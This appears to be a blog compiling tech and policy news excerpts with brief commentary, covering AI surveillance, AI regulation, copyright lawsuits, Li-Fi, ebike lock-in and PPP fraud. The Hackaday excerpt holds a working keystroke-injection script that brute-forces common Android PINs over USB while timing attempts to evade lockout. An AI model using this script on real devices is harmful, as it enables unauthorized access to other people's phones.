Research group develops biodegradable film that keeps food fresh for longer

[…]

a film made of a compound derived from limonene, the main component of citrus fruit peel, and chitosan, a biopolymer derived from the chitin present in exoskeletons of crustaceans.

The film was developed by a research group in São Paulo state, Brazil, comprising scientists in the Department of Materials Engineering and Bioprocesses at the State University of Campinas’s School of Chemical Engineering (FEQ-UNICAMP) and the Packaging Technology Center at the Institute of Food Technology (ITAL) of the São Paulo State Department of Agriculture and Supply, also in Campinas.

The results of the research are reported in an article published in Food Packaging and Shelf Life.

[…]

Limonene has been used before in food packaging films to enhance preservation thanks to its antioxidant and antimicrobial action, but its performance is impaired by its volatility and instability during the packaging manufacturing process, even on a laboratory scale.

[…]

“The films with the poly(limonene) additive outperformed those with limonene, especially in terms of antioxidant activity, which was about twice as potent,” Vieira said. The substance also performed satisfactorily as an ultraviolet radiation blocker and was found to be non-volatile, making it suitable for large-scale production of packaging, where processing conditions are more severe.

The films are not yet available for use by manufacturers, mainly because chitosan-based plastic is not yet produced on a sufficiently large scale to be competitive, but also because the poly(limonene) production process needs to be optimized to improve yield and to be tested during the manufacturing of commercial packaging.

[…]

More information: Sayeny de Ávila Gonçalves et al, Poly(limonene): A novel renewable oligomeric antioxidant and UV-light blocking additive for chitosan-based films, Food Packaging and Shelf Life (2023). DOI: 10.1016/j.fpsl.2023.101085

Source: Research group develops biodegradable film that keeps food fresh for longer

AI System Identified Drug Trafficker by Scanning Driving Patterns

Police in New York recently managed to identify and apprehend a drug trafficker seemingly by magic. The perp in question, David Zayas, was traveling through the small upstate town of Scarsdale when he was pulled over by Westchester County police. When cops searched Zayas’ vehicle they found a large amount of crack cocaine, a gun, and over $34,000 in cash. The arrestee later pleaded guilty to a drug trafficking charge.

How exactly did cops know Zayas fit the bill for drug trafficking?

Forbes reports that authorities used the services of a company called Rekor to analyze traffic patterns regionally and, in the course of that analysis, the program identified Zayas as suspicious.

For years, cops have used license plate reading systems to look out for drivers who might have an expired license or are wanted for prior violations. Now, however, AI integrations seem to be making the tech frighteningly good at identifying other kinds of criminality just by observing driver behavior.

Rekor describes itself as an AI-driven “roadway intelligence” platform and it contracts with police departments and other public agencies all across the country. It also works with private businesses. Using Rekor’s software, New York cops were able to sift through a gigantic database of information culled from regional roadways by its county-wide ALPR [automatic license plate recognition] system. That system—which Forbes says is made up of 480 cameras distributed throughout the region—routinely scans 16 million vehicles a week, capturing identifying data points like a vehicle’s license plate number, make, and model. By recording and reverse-engineering vehicle trajectories as they travel across the state, cops can apparently use software to assess whether particular routes are suspicious or not.

In this case, Rekor helped police to assess the route that Zayas’ car was taking on a multi-year basis. The algorithm—which found that the driver was routinely making trips back and forth between Massachusetts and certain areas of upstate New York—determined that Zayas’ routes were “known to be used by narcotics pushers and [involved]…conspicuously short stays,” Forbes writes. As a result, the program deemed Zayas’s activity consistent with that of a drug trafficker.
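
Rekor hasn’t published how its scoring works, but the behaviour described above – flagged corridors plus conspicuously short stays, evaluated over a multi-year trip history – maps onto a very simple pattern check. A toy sketch in Python, with every name and threshold invented purely for illustration:

```python
# Toy sketch of route-pattern scoring as described above. Rekor has not
# published its algorithm; every name and threshold here is invented
# purely for illustration.
from dataclasses import dataclass
from datetime import timedelta

@dataclass
class Trip:
    origin: str          # region inferred from the first camera sighting
    destination: str     # region inferred from the last camera sighting
    stay: timedelta      # time spent at the destination before returning

# Hypothetical corridors an analyst has flagged as known trafficking routes.
FLAGGED_CORRIDORS = {("MA", "upstate-NY")}
SHORT_STAY = timedelta(hours=2)

def suspicion_score(trips: list[Trip]) -> float:
    """Fraction of a vehicle's recorded round trips that follow a flagged
    corridor with a conspicuously short stay."""
    if not trips:
        return 0.0
    hits = sum(
        1 for t in trips
        if (t.origin, t.destination) in FLAGGED_CORRIDORS and t.stay < SHORT_STAY
    )
    return hits / len(trips)

# Eight short round trips along a flagged corridor over the logged period.
history = [Trip("MA", "upstate-NY", timedelta(minutes=45))] * 8
print(f"suspicion: {suspicion_score(history):.2f}")  # 1.00
```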

Artificial intelligence has been getting a lot of attention in recent months due to the disruptions it’s made to the media and software industries but less attention has been paid to how this new technology will inevitably supercharge existing surveillance systems. If cops can already ID a drug trafficker with the click of a button, just think how good this tech will be in ten years’ time. As regulations evolve, one would hope governments will figure out how to reasonably deploy this technology without leading us right off the cliff into Minority Report territory. I mean, they probably won’t, but a guy can dream, can’t he?

Source: AI System Identified Drug Trafficker by Scanning Driving Patterns

There is no way at all that this could possibly go wrong, right? See the comments in the link.

China sets AI rules – not just risk-based (like the EU AI Act), but also ideological

Chinese authorities published the nation’s rules governing generative AI on Thursday, including protections that aren’t in place elsewhere in the world.

Some of the rules require operators of generative AI to ensure their services “adhere to the core values of socialism” and don’t produce output that includes “incitement to subvert state power.” AIs are also required to avoid inciting secession, undermining national unity and social stability, or promoting terrorism.

Generative AI services behind the Great Firewall are also not to promote prohibited content that provokes ethnic hatred and discrimination, violence, obscenity, or “false and harmful information.” Those content-related rules don’t deviate from an April 2023 draft.

But deeper in, there’s a hint that China fancies digital public goods for generative AI. The doc calls for promotion of public training data resource platforms and collaborative sharing of model-making hardware to improve its utilization rates.

Authorities also want “orderly opening of public data classification, and [to] expand high-quality public training data resources.”

Another requirement is for AI to be developed with known secure tools: the doc calls for chips, software, tools, computing power and data resources to be proven quantities.

AI operators must also respect the intellectual property rights of data used in models, secure consent of individuals before including personal information, and work to “improve the quality of training data, and enhance the authenticity, accuracy, objectivity, and diversity of training data.”

As developers create algorithms, they’re required to ensure they don’t discriminate based on ethnicity, belief, country, region, gender, age, occupation, or health.

Operators are also required to secure licenses for their AIs under most circumstances.

AI deployed outside China has already run afoul of some of Beijing’s requirements. Just last week OpenAI was sued by novelists and comedians for training on their works without permission. Facial recognition tools used by the UK’s Metropolitan Police have displayed bias.

Hardly a week passes without one of China’s tech giants unveiling further AI services. Last week Alibaba announced a text-to-image service, and Huawei discussed a third-gen weather prediction AI.

The new rules come into force on August 15. Chinese orgs tempted to cut corners and/or flout the rules have the very recent example of Beijing’s massive fines imposed on Ant Group and Tencent as a reminder that straying from the rules will lead to pain – and possibly years of punishment.

Source: China sets AI rules that protect IP, people, and The Party • The Register

A Bunch Of Authors Sue OpenAI Claiming Copyright Infringement, Because They Don’t Understand Copyright

You may have seen some headlines recently about some authors filing lawsuits against OpenAI. The lawsuits (plural, though I’m confused why it’s separate attempts at filing a class action lawsuit, rather than a single one) began last week, when authors Paul Tremblay and Mona Awad sued OpenAI and various subsidiaries, claiming copyright infringement in how OpenAI trained its models. They got a lot more attention over the weekend when another class action lawsuit was filed against OpenAI with comedian Sarah Silverman as the lead plaintiff, along with Christopher Golden and Richard Kadrey. The same day the same three plaintiffs (though with Kadrey now listed as the top plaintiff) also sued Meta, though the complaint is basically the same.

All three cases were filed by Joseph Saveri, a plaintiffs’ class action lawyer who specializes in antitrust litigation. As with all too many class actions, the goal is generally enriching the class action lawyers rather than stopping any actual wrong. Saveri is not a copyright expert, and the lawsuits… show that. They rest on a ton of assumptions about how Saveri seems to think copyright law works – assumptions entirely inconsistent with how it actually works.

The complaints are basically all the same, and what they come down to is the argument that AI systems were trained on copyright-covered material (duh) and that this somehow violates the authors’ copyrights.

Much of the material in OpenAI’s training datasets, however, comes from copyrighted works—including books written by Plaintiffs—that were copied by OpenAI without consent, without credit, and without compensation.

But… this is both wrong and not quite how copyright law works. Training an LLM does not require “copying” the work in question, but rather reading it. To some extent, this lawsuit is basically arguing that merely reading a copyright-covered work is, itself, copyright infringement.

Under this definition, all search engines would be copyright infringing, because they’re effectively doing the same thing: scanning web pages and learning from what they find to build an index. But courts have already said that’s not even remotely true. And if scanning content on the web to build a search index is clearly transformative fair use, so too would be scanning internet content to train an LLM. Arguably the latter is far more transformative.

And this is the way it should be, because otherwise, it would basically be saying that anyone reading a work by someone else, and then being inspired to create something new would be infringing on the works they were inspired by. I recognize that the Blurred Lines case sorta went in the opposite direction when it came to music, but more recent decisions have really chipped away at Blurred Lines, and even the recording industry (the recording industry!) is arguing that the Blurred Lines case extended copyright too far.

But, if you look at the details of these lawsuits, they’re not alleging any actual copying (which, you know, is kind of important for there to be copyright infringement), just that the LLMs have learned from the works of the authors who are suing. The evidence there is, well… extraordinarily weak.

For example, in the Tremblay case, they asked ChatGPT to “summarize” his book “The Cabin at the End of the World,” and ChatGPT does so. They do the same in the Silverman case, with her book “The Bedwetter.” If those are infringing, so is every book report by every schoolchild ever. That’s just not how copyright law works.

The lawsuit tries one other tactic here to argue infringement, beyond just “the LLMs read our books.” It also claims that the corpus of data used to train the LLMs was itself infringing.

For instance, in its June 2018 paper introducing GPT-1 (called “Improving Language Understanding by Generative Pre-Training”), OpenAI revealed that it trained GPT-1 on BookCorpus, a collection of “over 7,000 unique unpublished books from a variety of genres including Adventure, Fantasy, and Romance.” OpenAI confirmed why a dataset of books was so valuable: “Crucially, it contains long stretches of contiguous text, which allows the generative model to learn to condition on long-range information.” Hundreds of large language models have been trained on BookCorpus, including those made by OpenAI, Google, Amazon, and others.

BookCorpus, however, is a controversial dataset. It was assembled in 2015 by a team of AI researchers for the purpose of training language models. They copied the books from a website called Smashwords, which hosts self-published novels that are available to readers at no cost. Those novels, however, are largely under copyright. They were copied into the BookCorpus dataset without consent, credit, or compensation to the authors.

If that’s the case, then they could make the argument that BookCorpus itself is infringing on copyright (though, again, I’d argue there’s a very strong fair use claim under the Perfect 10 cases), but that’s separate from the question of whether or not training on that data is infringing.

And that’s also true of the other claims of secret pirated copies of books that the complaint insists OpenAI must have relied on:

As noted in Paragraph 32, supra, the OpenAI Books2 dataset can be estimated to contain about 294,000 titles. The only “internet-based books corpora” that have ever offered that much material are notorious “shadow library” websites like Library Genesis (aka LibGen), Z-Library (aka B-ok), Sci-Hub, and Bibliotik. The books aggregated by these websites have also been available in bulk via torrent systems. These flagrantly illegal shadow libraries have long been of interest to the AI-training community: for instance, an AI training dataset published in December 2020 by EleutherAI called “Books3” includes a recreation of the Bibliotik collection and contains nearly 200,000 books. On information and belief, the OpenAI Books2 dataset includes books copied from these “shadow libraries,” because those are the most likely sources of trainable books similar in nature and size to OpenAI’s description of Books2.

Again, think of the implications if this is copyright infringement. If a musician were inspired to create music in a certain genre after hearing pirated songs in that genre, would that make the songs they created infringing? No one thinks that makes sense except the most extreme copyright maximalists. But that’s not how the law actually works.

This entire line of cases is just based on a total and complete misunderstanding of copyright law. I completely understand that many creative folks are worried and scared about AI, and in particular that it was trained on their works, and can often (if imperfectly) create works inspired by them. But… that’s also how human creativity works.

Humans read, listen, watch, learn from, and are inspired by those who came before them. And then they synthesize that with other things, and create new works, often seeking to emulate the styles of those they learned from. AI systems and LLMs are doing the same thing. It’s not infringing to learn from and be inspired by the works of others. It’s not infringing to write a book report style summary of the works of others.

I understand the emotional appeal of these kinds of lawsuits, but the legal reality is that these cases seem doomed to fail, and possibly in a way that will leave the plaintiffs having to pay legal fees (since in copyright cases, legal fee awards are much more common).

That said, if we’ve learned anything at all in the past two-plus decades of lawsuits about copyright and the internet, it’s that courts will sometimes bend over backwards to rewrite copyright law to pretend it says what they want it to say, rather than what it does say. If that happens here, however, it would be a huge loss to human creativity.

Source: A Bunch Of Authors Sue OpenAI Claiming Copyright Infringement, Because They Don’t Understand Copyright | Techdirt

Brute Forcing A Mobile’s PIN Over USB With A $3 Board

Mobile PINs are a lot like passwords in that there are a number of very common ones, and [Mobile Hacker] has a clever proof of concept that uses a tiny microcontroller development board to emulate a keyboard to test the 20 most common unlock PINs on an Android device.

Trying the twenty most common PINs doesn’t take long.

The project is based on research analyzing the security of 4- and 6-digit smartphone PINs which found some striking similarities between user-chosen unlock codes. While the research is a few years old, user behavior in terms of PIN choice has probably not changed much.

The hardware is not much more than a Digispark board, a small ATtiny85-based board with a built-in USB connector, and an adapter. In fact, it has a lot in common with the DIY Rubber Ducky except for being focused on doing a single job.

Once connected to a mobile device, it performs a keystroke injection attack, automatically sending keyboard events to enter the most common PINs, with a delay between each attempt. Assuming the device accepts USB keyboard input, trying all twenty codes takes about six minutes.
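
[Mobile Hacker]’s firmware is an Arduino C++ sketch built on the Digispark’s DigiKeyboard library, but the core loop is simple enough to show in a few lines. Here is an equivalent sketch in CircuitPython with the adafruit_hid library (an illustrative stand-in for the original code, assuming a Pi Pico-class board):

```python
# Keystroke-injection loop, sketched in CircuitPython with the adafruit_hid
# library (e.g. on a Pi Pico-class board). This is an illustrative stand-in,
# NOT [Mobile Hacker]'s firmware, which is an Arduino C++ sketch using the
# Digispark's DigiKeyboard library.
import time
import usb_hid
from adafruit_hid.keyboard import Keyboard
from adafruit_hid.keyboard_layout_us import KeyboardLayoutUS
from adafruit_hid.keycode import Keycode

# A few of the most commonly reported 4-digit PINs; the PoC tries twenty.
COMMON_PINS = ["1234", "0000", "2580", "1111", "5555", "5683", "0852", "2222"]

kbd = Keyboard(usb_hid.devices)
layout = KeyboardLayoutUS(kbd)

time.sleep(5)  # give the phone time to enumerate the fake keyboard

for pin in COMMON_PINS:
    layout.write(pin)        # type the candidate PIN
    kbd.send(Keycode.ENTER)  # submit it
    time.sleep(18)           # pacing that dodges Android's lockout throttling;
                             # at ~18 s per try, twenty PINs take about six minutes
```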

Disabling OTG connections is one way to protect a device against this kind of attack, and not using a common PIN like ‘1111’ or ‘1234’ is even better. You can see the brute forcing in action in the video embedded in the source post.

Source: Brute Forcing A Mobile’s PIN Over USB With A $3 Board | Hackaday

100x Faster Than Wi-Fi: Light-Based Networking Standard Released

Today, the Institute of Electrical and Electronics Engineers (IEEE) added 802.11bb as a standard for light-based wireless communications. The publication of the standard has been welcomed by global Li-Fi businesses, as it will help speed the rollout and adoption of the data-transmission technology.

Advantages of using light rather than radio frequencies (RF) are highlighted by Li-Fi proponents including pureLiFi, Fraunhofer HHI, and the Light Communications 802.11bb Task Group. Li-Fi is said to deliver “faster, more reliable wireless communications with unparalleled security compared to conventional technologies such as Wi-Fi and 5G.” Now that the IEEE 802.11bb Li-Fi standard has been released, it is hoped that interoperability of Li-Fi systems with Wi-Fi will be fully addressed.

[…]

Where Li-Fi shines (pun intended) is not just in its purported speeds of up to 224 Gb/s. Fraunhofer’s Dominic Schulz points out that because it works in an exclusive optical spectrum, it ensures higher reliability and lower latency and jitter. Moreover, “Light’s line-of-sight propagation enhances security by preventing wall penetration, reducing jamming and eavesdropping risks, and enabling centimetre-precision indoor navigation,” says Schulz.

[…]

One of the big wheels of Li-Fi, pureLiFi, has already prepared the Light Antenna ONE module for integration into connected devices.

[…]

Source: 100x Faster Than Wi-Fi: Light-Based Networking Standard Released | Tom’s Hardware

VanMoof ebikes could be bricked if servers go down – fortunately security is so bad a rival has an app to let you unlock them

[…] an app is required to use many of the smart features of its bikes – and that app relies on communication with VanMoof servers. If the company goes under, and the servers go offline, that could leave ebike owners unable to even unlock their bikes

[…]

While unlocking is activated by Bluetooth when your phone comes into range of the bike, it relies on a rolling key code – and that function in turn relies on access to a VanMoof server. If the company goes bust, then no server, no key code generation, no unlock.

Rival ebike company Cowboy has a solution

A rival ebike maker, Belgian company Cowboy, has stepped in to offer a solution. TNW reports that it has created an app which allows VanMoof owners to generate and save their own digital key, which can be used in place of one created by a VanMoof server.

If you have a VanMoof bike, grab the app now, as it requires an initial connection to the VanMoof server to fetch your current keycode. If the server goes offline, existing Bikey App users can continue to unlock their bikes, but it will no longer be possible for new users to activate it.
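
VanMoof hasn’t documented its scheme, but rolling codes are commonly built on counter-based one-time passwords (HOTP, RFC 4226): once phone and bike share a secret and a counter, no server is needed to generate codes. A minimal sketch of that general technique – an assumption for illustration, not VanMoof’s actual protocol:

```python
# Sketch of a counter-based rolling code (HOTP, RFC 4226): the general
# technique behind rolling unlock codes, NOT VanMoof's actual, undocumented
# protocol. Standard library only.
import hashlib
import hmac
import struct

def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """One-time code derived from a shared secret and a moving counter."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                                  # dynamic truncation
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10**digits).zfill(digits)

# Once phone and bike share the secret and counter, codes can be generated
# with no server at all, which is why saving the key while the server is
# still up keeps the bike unlockable later.
secret = b"secret-provisioned-at-pairing"  # hypothetical value
for counter in range(3):
    print(hotp(secret, counter))
```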

[…]

In some cases, a companion app may work perfectly well in standalone mode, but it’s surprising how often a server connection is required to access the full feature set.

[…]

Perhaps we need standards here. For example, requiring all functionality (bar firmware updates) to work without access to an external server.

Where this isn’t technically possible, perhaps there should be a legal requirement for essential software to be automatically open-sourced in the event of bankruptcy, so that there would be the option of techier owners banding together to host and maintain the server-side code?

[…]

Source: VanMoof ebike mess highlights a risk with pricey smart hardware

Yup, there are too many examples of good hardware being turned into junk because the OEM goes bankrupt or just decides to stop supporting it. Something needs to be done about this.

PPP fraud is ‘worst in history’: $200B stolen, splurged on Lamborghinis and bling

Tens of thousands of fraudsters splurged on Lamborghinis, vacation homes, private jet flights and Cartier jewelry by fleecing the PPP loan system in a $200 billion heist — and did it because the COVID loan scheme was so easy to milk.

Approximately $1.2 trillion was rushed through Congress in 2020 and 2021 in COVID bailout cash for businesses and spent on the Economic Injury Disaster Loan Program (EIDLP) and the Paycheck Protection Program (PPP) schemes.

But a new report from the Small Business Administration’s Office of Inspector General reveals an astonishing 17% vanished to fraud — an estimated total of $200 billion.

And the SBA says it estimates there are more than 90,000 “actionable leads,” while it has already prosecuted dozens — including a former New York Jets wide receiver, Josh Bellamy.

The spending spree on taxpayer dollars includes Donald Finley, owner of the now-shuttered Manhattan theme restaurant Jekyll & Hyde, who used millions of dollars from PPP and EIDLP to purchase a Nantucket home with waterfront views across from Dionis Beach.

Finley faces up to 30 years in prison, more than $3.2 million in restitution, and a $1.25 million fine.

And experts say crooks created fake businesses or lied about their numbers of employees to get access to more free cash — because it was so simple to fleece the taxpayer.

“The fraud was so easy to commit. All of the information was self-reported and none of it was verified or checked,” Haywood Talcove of LexisNexis Risk Solutions told The Post.

“During the height of the pandemic, it was really hard to purchase [luxury] items like a Rolls-Royce, or a high-end Mercedes because you had people walking in with cash from the PPP program to purchase those items for whatever the dealer was asking,” Talcove said.

Justice might finally be catching up with some of the fraudsters: A total of 803 arrests have taken place as of May 2023 for pandemic fraud, the SBA said.

[…]

Source: PPP fraud is ‘worst in history’: $200B stolen, splurged on Lamborghinis and bling

Hollywood studios proposed AI contract that would give them likeness rights ‘for the rest of eternity’

During today’s press conference in which Hollywood actors confirmed that they were going on strike, Duncan Crabtree-Ireland, SAG-AFTRA’s chief negotiator, revealed a proposal from Hollywood studios that sounds ripped right out of a Black Mirror episode.

In a statement about the strike, the Alliance of Motion Picture and Television Producers (AMPTP) said that its proposal included “a groundbreaking AI proposal that protects actors’ digital likenesses for SAG-AFTRA members.”

“If you think that’s a groundbreaking proposal, I suggest you think again.”

When asked about the proposal during the press conference, Crabtree-Ireland said that “This ‘groundbreaking’ AI proposal that they gave us yesterday, they proposed that our background performers should be able to be scanned, get one day’s pay, and their companies should own that scan, their image, their likeness and should be able to use it for the rest of eternity on any project they want, with no consent and no compensation. So if you think that’s a groundbreaking proposal, I suggest you think again.”

In response, AMPTP spokesperson Scott Rowe sent out a statement denying the claims made during SAG-AFTRA’s press conference. “The claim made today by SAG-AFTRA leadership that the digital replicas of background actors may be used in perpetuity with no consent or compensation is false. In fact, the current AMPTP proposal only permits a company to use the digital replica of a background actor in the motion picture for which the background actor is employed. Any other use requires the background actor’s consent and bargaining for the use, subject to a minimum payment.”

The use of generative AI has been one of the major sticking points in negotiations between the two sides (it’s also a major issue behind the writers strike), and in her opening statement of the press conference, SAG-AFTRA president Fran Drescher said that “If we don’t stand tall right now, we are all going to be in trouble, we are all going to be in jeopardy of being replaced by machines.”

Source: Hollywood studios proposed AI contract that would give them likeness rights ‘for the rest of eternity’ – The Verge

Discussing The Tastier Side Of Desktop 3D Printing

[…]

After nearly a decade in development, Ellie Weinstein’s Cocoa Press chocolate 3D printer kit is expected to start shipping before the end of the year. Derived from the Voron 0.1 design, the kit is meant to help those with existing 3D printing experience expand their repertoire beyond plastics and into something a bit sweeter.

So who better to host our recent 3D Printing Food Hack Chat? Ellie took the time to answer questions not just about the Cocoa Press itself, but the wider world of printing edible materials. While primarily designed for printing chocolate, with some tweaks, the hardware is capable of extruding other substances such as icing or peanut butter. It’s just a matter of getting the printers in the hands of hackers and makers, and seeing what they’ve got an appetite for.

So, why chocolate? It’s a pretty straightforward question to start the chat on, but Ellie’s answer might come as a surprise. It wasn’t due to some love of chocolate or desire to print custom sweets, at least, not entirely. She simply thought it would be an easy material to work with when she started tinkering with the initial versions of her printer back in 2014. The rationale was that it didn’t take much energy to melt, and that it would return to a solid on its own at room temperature. While true, this temperature sensitivity ended up being exactly why it was such a challenge to work with.

[…]


Source: Discussing The Tastier Side Of Desktop 3D Printing | Hackaday

How AI could help local newsrooms remain afloat in a sea of misinformation – read and learn, Gizmodo staffers

It didn’t take long for the downsides of a generative AI-empowered newsroom to make themselves obvious, between CNet’s secret chatbot reviews editor last November and Buzzfeed’s subsequent mass layoffs of human staff in favor of AI-generated “content” creators. The specter of being replaced by a “good enough AI” looms large in many a journalist’s mind these days with as many as a third of the nation’s newsrooms expected to shutter by the middle of the decade.

But AI doesn’t have to necessarily be an existential threat to the field. As six research teams showed at NYU Media Lab’s AI & Local News Initiative demo day in late June, the technology may also be the key to foundationally transforming the way local news is gathered and produced.

Now in its second year, the initiative is tasked with helping local news organizations to “harness the power of artificial intelligence to drive success.” It’s backed as part of a larger $3 million grant from the Knight Foundation which is funding four such programs in total in partnership with the Associated Press, Brown Institute’s Local News Lab, NYC Media Lab and the Partnership on AI.

This year’s cohort included a mix of teams from academia and private industry, coming together over the course of the 12-week development course to build “AI applications for local news to empower journalists, support the sustainability of news organizations and provide quality information for local news audiences,” NYU Tandon’s news service reported.

“There’s value in being able to bring together people who are working on these problems from a lot of different angles,” Matt Macvey, Community and Project Lead for the initiative, told Engadget, “and that that’s what we’ve tried to facilitate.”

“It also creates an opportunity because … if these news organizations that are out there doing good work are able to keep communicating their value and maintain trust with their readers,” he continued. “I think we could get an information ecosystem where a trusted news source becomes even more valued when it becomes easier [for anyone] to make low-quality [AI generated] content.”

[…]

“Bangla AI will search for information relevant to the people of the Bengali community that has been published in mainstream media … then it will translate for them. So when journalists use Bangla AI, they will see the information in Bengali rather than in English.” The system will also generate summaries of mainstream media posts both in English and Bengali, freeing up local journalists to cover more important news than rewriting wire copy.

Similarly, the team from Chequeado, a non-profit organization fighting disinformation in public discourse, showed off the latest developments of its Chequeabot platform, Monitorio. It leverages AI and natural language processing to streamline fact-checking in Spanish-language media. Its dashboard continually monitors social media for trending misinformation and alerts fact-checkers so they can blunt a piece’s virality.

“One of the greatest promises of things like this and Bangla AI,” Chequeado team member Marcos Barroso said during the demo, “is the ability for this kind of technology to go to an under-resourced newsroom and improve their capacity, and allow them to be more efficient.”

The Newsroom AI team from Cornell University hopes that its writing assistant platform will help do for journalists what Copilot did for coders – eliminate drudge work. Newsroom can automate a number of common tasks including transcription and information organization, image and headline generation, and SEO implementation. The system will reportedly even write articles in a journalist’s personal style if fed enough training examples.

On the audio side, New York public radio WNYC’s team spent its time developing and prototyping a speech-to-text model that will generate real-time captioning and transcription for its live broadcasts. WNYC is the largest public media station in New York, reaching 2 million visitors monthly through its news website.

“Our live broadcast doesn’t have a meaningful entry point right now for deaf or hard of hearing audiences,” WNYC team member Sam Guzik said during the demo. “So, what we really want to think about as we’re looking to the future is, ‘how can we make our audio more accessible to those folks who can’t hear?’”

Utilizing AI to perform the speech-to-text transformation alleviates one of the biggest sticking points of modern closed-captioning: that it’s expensive and resource-intensive to turn around quickly when you have humans do it. “Speech-to-text models are relatively low cost,” Guzik continued. “They can operate at scale and they support an API driven architecture that would tie into our experiences.”

The result is a proof-of-concept audio player for the WNYC website that generates accurate closed captioning of whatever clip is currently being played. The system can go a step further by summarizing the contents of that clip in a few bullet points, simply by clicking a button on the audio player.
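
WNYC hasn’t said which model its prototype uses. For a sense of how little code a basic, non-live version of this takes, here’s a sketch with the open-source Whisper model standing in (an assumption – true live captioning additionally needs audio streaming and chunking):

```python
# Sketch of clip transcription with the open-source Whisper model
# (pip install openai-whisper). An assumed stand-in: WNYC has not said
# which speech-to-text model its prototype uses, and real live captioning
# also needs audio streaming and chunking on top of this.
import whisper

model = whisper.load_model("base")        # small enough to run on a CPU
result = model.transcribe("segment.mp3")  # hypothetical audio clip

print(result["text"])                     # full transcript
for seg in result["segments"]:            # timestamped caption lines
    print(f"[{seg['start']:7.2f}s -> {seg['end']:7.2f}s] {seg['text']}")
```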

[…]

the Graham Media Group created an automated natural language text prompter to nudge the comments sections of local news articles closer towards civility.

“The comment-bot posts the first comment on stories to guide conversations and hopefully grow participation and drive users deeper into our engagement funnels,” GMG team member Dustin Block said during the demo. This solves two significant challenges that human comment moderation faces: preventing the loudest voices from dominating the discussion and providing form and structure to the conversation, he explained.

“The bot scans and understands news articles using the GPT 3.5 Turbo API. It generates thought-provoking starters and then it encourages discussions,” he continued. “It’s crafted to be friendly.”
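
GMG hasn’t published its prompts, but the GPT-3.5 Turbo call behind such a bot is straightforward. A minimal sketch using the openai Python SDK, with the prompt wording purely illustrative:

```python
# Minimal sketch of the GPT-3.5 Turbo call behind a first-comment bot.
# The prompt wording is purely illustrative; GMG has not published its
# prompts. Uses the openai Python SDK with OPENAI_API_KEY set.
from openai import OpenAI

client = OpenAI()

def opening_comment(article_text: str) -> str:
    """Generate one friendly, discussion-seeding question for an article."""
    resp = client.chat.completions.create(
        model="gpt-3.5-turbo",
        messages=[
            {"role": "system",
             "content": "You seed civil discussion on local news stories. "
                        "Write one friendly, thought-provoking question, "
                        "under 50 words, inviting readers to share views."},
            {"role": "user", "content": article_text},
        ],
        temperature=0.7,
    )
    return resp.choices[0].message.content.strip()

print(opening_comment("The city council votes tonight on the bike-lane plan..."))
```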

Whether the AI revolution remains friendly to the journalists it’s presumably augmenting remains to be seen, though Macvey isn’t worried. “Most news organizations, especially local news organizations, are so tight on resources and staff that there’s more happening out there than they can cover,” he said. “So I think tools like AI and [the automations seen during the demo day] [give] the journalists and editorial staff more bandwidth.”

Source: How AI could help local newsrooms remain afloat in a sea of misinformation | Engadget

The reason I cite Gizmodo here is that their AI/ML reporting is always on the negative, doom-and-gloom side. AI offers opportunities and it’s not going away.

New privacy deal allows US tech giants to continue storing European user data on American servers

Nearly three years after a 2020 court decision threatened to grind transatlantic e-commerce to a halt, the European Union has adopted a plan that will allow US tech giants to continue storing data about European users on American soil. In a decision announced Monday, the European Commission approved the Trans-Atlantic Data Privacy Framework. Under the terms of the deal, the US will establish a court Europeans can engage with if they feel a US tech platform violated their data privacy rights. President Joe Biden announced the creation of the Data Protection Review Court in an executive order he signed last fall. The court can order the deletion of user data and impose other remedial measures. The framework also limits access to European user data by US intelligence agencies.

The Trans-Atlantic Data Privacy Framework is the latest chapter in a saga that is now more than a decade in the making. It was only earlier this year that the EU fined Meta a record-breaking €1.2 billion after it found that Facebook’s practice of moving EU user data to US servers violated the bloc’s digital privacy laws. The EU also ordered Meta to delete the data it already had stored on its US servers if the company didn’t have a legal way to keep that information there by the fall. As The Wall Street Journal notes, Monday’s agreement should allow Meta to avoid the need to delete any data, but the company may still end up paying the fine.

Even with a new agreement in place, it probably won’t be smooth sailing just yet for the companies that depend the most on cross-border data flows. Max Schrems, the lawyer who successfully challenged the previous Safe Harbor and Privacy Shield agreements that governed transatlantic data transfers before today, told The Journal he plans to challenge the new framework. “We would need changes in US surveillance law to make this work and we simply don’t have it,” he said. For what it’s worth, the European Commission says it’s confident it can defend its new framework in court.

Source: New privacy deal allows US tech giants to continue storing European user data on American servers | Engadget

Another problem is that the US side is not enshrined in law, but in a presidential decree, which can be revoked at any time.

Rolls-Royce won’t let customers buy another car if they sell its new EV for a profit

The first Rolls-Royce EV, the Spectre, is going on sale soon at a cool $425,000 — and at that price, purchasing slots will be limited, to say the least. But any buyers planning to flip one for a quick profit may want to think twice. CEO Torsten Müller-Ötvös said that any customers attempting to resell their Spectre models for profit will be banned for life from ever buying another Rolls-Royce from official dealers, according to a report from Car Dealer.

“I can tell you we are really sanitizing the need to prove who you are, what you want to do with the car – you need to qualify for a car and then you might get a slot for an order,” he said. And anyone who violates the policy and sells the Spectre for a profit is “going immediately on a blacklist and this is it – you will never ever have the chance to acquire again.”

The British, BMW-owned company isn’t the first to impose bans on flipping its vehicles. Last year, GM said it would ban buyers from flipping Hummer EVs, Corvette Z06s and other vehicles within 12 months, under threat of limiting the transferability of certain warranties. On top of that stick, it offered a carrot in the form of $5,000 in reward points for customers who kept their eighth-generation Corvette Z06s for at least a year.

[…]

Source: Rolls-Royce won’t let customers buy another car if they sell its new EV for a profit | Engadget

Car dealers don’t like it, but with this much demand coupled with such low supply, they are effectively blocked out of this product range anyway.

How An AI-Written ‘Star Wars’ Story Shows Yet Again the Luddism at Gizmodo

G/O Media is the owner of top sites like Gizmodo, Kotaku, Quartz, and the Onion. Last month they announced “modest tests” of AI-generated content on their sites — and it didn’t go over well within the company, reports the Washington Post.

Soon the Deputy Editor of Gizmodo’s science fiction section io9 was flagging 18 “concerns, corrections and comments” about an AI-generated story by “Gizmodo Bot” on the chronological order of Star Wars movies and TV shows. “I have never had to deal with this basic level of incompetence with any of the colleagues that I have ever worked with,” James Whitbrook told the Post in an interview. “If these AI [chatbots] can’t even do something as basic as put a Star Wars movie in order one after the other, I don’t think you can trust it to [report] any kind of accurate information.”

